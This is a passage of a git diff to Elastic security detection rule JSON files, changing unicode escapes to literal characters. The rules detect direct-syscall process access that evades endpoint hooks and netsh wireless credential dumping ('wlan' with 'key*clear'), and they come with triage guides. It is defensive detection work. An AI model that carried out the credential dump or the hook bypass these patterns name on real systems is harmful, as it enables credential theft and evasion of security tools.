- "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or 
created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n",
 "references": [
 "https://twitter.com/SBousseaden/status/1278013896440324096",
 "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs"
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json
index 83216cd6c1c..04bffa829ea 100644
--- a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json
index 99feb0c78ab..f1b5e2e5280 100644
--- a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json
index f4404b64b31..4fc73821baa 100644
--- a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json
index e94d0ff5b74..3c6e7769cd9 100644
--- a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json
index f6a985a6662..9fde933de49 100644
--- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Wireless Credential Dumping using Netsh Command",
- "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n",
 "references": [
 "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json
index deff664a3ed..b21707c777f 100644
--- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Wireless Credential Dumping using Netsh Command",
- "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n",
 "references": [
 "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json
index 7d08ff6488d..7766d987b0d 100644
--- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Wireless Credential Dumping using Netsh Command", - "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n",
 "references": [
 "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts",
@@ -71,7 +71,7 @@
